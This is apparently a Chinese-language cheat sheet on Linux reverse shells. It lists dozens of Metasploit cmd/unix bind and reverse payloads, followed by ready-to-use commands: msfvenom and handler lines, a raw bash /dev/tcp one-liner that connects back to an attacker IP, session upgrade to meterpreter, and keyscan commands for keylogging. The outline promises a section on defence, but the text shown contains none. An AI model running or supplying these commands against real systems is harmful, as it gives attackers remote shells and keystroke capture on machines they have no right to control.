linux反弹shell

linux系统40多种不同类型的反弹shell

  1. linux比windows反弹shell的手法要多得多

  2. msf的shellcode加载器msfvenom msfvenom -l payload |grep cmd/unix 如何查找自己需要的shellcode类型

  3. 40多种linux反弹shell的手法

  4. 反弹shell攻击的防御

msfvenom一句话反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
    cmd/unix/bind_awk                                   Listen for a connection and spawn a command shell via GNU AWK
    cmd/unix/bind_busybox_telnetd                       Listen for a connection and spawn a command shell via BusyBox telnetd
    cmd/unix/bind_inetd                                 Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_jjs                                   Listen for a connection and spawn a command shell via jjs
    cmd/unix/bind_lua                                   Listen for a connection and spawn a command shell via Lua
    cmd/unix/bind_netcat                                Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_netcat_gaping                         Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_netcat_gaping_ipv6                    Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_nodejs                                Continually listen for a connection and spawn a command shell via nodejs
    cmd/unix/bind_perl                                  Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_perl_ipv6                             Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_r                                     Continually listen for a connection and spawn a command shell via R
    cmd/unix/bind_ruby                                  Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/bind_ruby_ipv6                             Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/bind_socat_udp                             Creates an interactive shell via socat
    cmd/unix/bind_stub                                  Listen for a connection and spawn a command shell (stub only, no payload)
    cmd/unix/bind_zsh                                   Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.
    cmd/unix/generic                                    Executes the supplied command
    cmd/unix/interact                                   Interacts with a shell on an established socket connection
    cmd/unix/pingback_bind                              Accept a connection, send a UUID, then exit
    cmd/unix/pingback_reverse                           Creates a socket, send a UUID, then exit
    cmd/unix/reverse                                    Creates an interactive shell through two inbound connections
    cmd/unix/reverse_awk                                Creates an interactive shell via GNU AWK
    cmd/unix/reverse_bash                               Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature.
    cmd/unix/reverse_bash_telnet_ssl                    Creates an interactive shell via mkfifo and telnet. This method works on Debian and other systems compiled without /dev/tcp support. This module uses the '-z' option included on some systems to encrypt using SSL.
    cmd/unix/reverse_bash_udp                           Creates an interactive shell via bash's builtin /dev/udp. This will not work on circa 2009 and older Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/udp feature.
    cmd/unix/reverse_jjs                                Connect back and create a command shell via jjs
    cmd/unix/reverse_ksh                                Connect back and create a command shell via Ksh. Note: Although Ksh is often available, please be aware it isn't usually installed by default.
    cmd/unix/reverse_lua                                Creates an interactive shell via Lua
    cmd/unix/reverse_ncat_ssl                           Creates an interactive shell via ncat, utilizing ssl mode
    cmd/unix/reverse_netcat                             Creates an interactive shell via netcat
    cmd/unix/reverse_netcat_gaping                      Creates an interactive shell via netcat
    cmd/unix/reverse_nodejs                             Continually listen for a connection and spawn a command shell via nodejs
    cmd/unix/reverse_openssl                            Creates an interactive shell through two inbound connections
    cmd/unix/reverse_perl                               Creates an interactive shell via perl
    cmd/unix/reverse_perl_ssl                           Creates an interactive shell via perl, uses SSL
    cmd/unix/reverse_php_ssl                            Creates an interactive shell via php, uses SSL
    cmd/unix/reverse_python                             Connect back and create a command shell via Python
    cmd/unix/reverse_python_ssl                         Creates an interactive shell via python, uses SSL, encodes with base64 by design.
    cmd/unix/reverse_r                                  Connect back and create a command shell via R
    cmd/unix/reverse_ruby                               Connect back and create a command shell via Ruby
    cmd/unix/reverse_ruby_ssl                           Connect back and create a command shell via Ruby, uses SSL
    cmd/unix/reverse_socat_udp                          Creates an interactive shell via socat
    cmd/unix/reverse_ssh                                Connect back and create a command shell via SSH
    cmd/unix/reverse_ssl_double_telnet                  Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
    cmd/unix/reverse_stub                               Creates an interactive shell through an inbound connection (stub only, no payload)
    cmd/unix/reverse_tclsh                              Creates an interactive shell via Tclsh
    cmd/unix/reverse_zsh                                Connect back and create a command shell via Zsh. Note: Although Zsh is often available, please be aware it isn't usually installed by default.
    tty/unix/interact                                   Interacts with a TTY on an established socket connection

常用一句话反弹shell命令速查

linux cmd

1
2
3
4
5
handler -H 10.10.14.7 -P 6678 -p cmd/unix/reverse_bash

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.7 LPORT=6678 -f raw

0<&43-;exec 43<>/dev/tcp/192.168.123.123/6678;sh <&43 >&43 2>&43

python reverse

1
2
3
4
handler -H 192.168.123.123 -P 6688 -p cmd/unix/reverse_python

msfvenom -p cmd/unix/reverse_python LHOST=192.168.123.123 LPORT=6688 -f raw

session -u $session-id

可以新建一个meterpreter类型的session。

得到meterpreter的session以后

1
2
3
keyscan_start

keyscan_dump

可以进行键盘记录

参考资料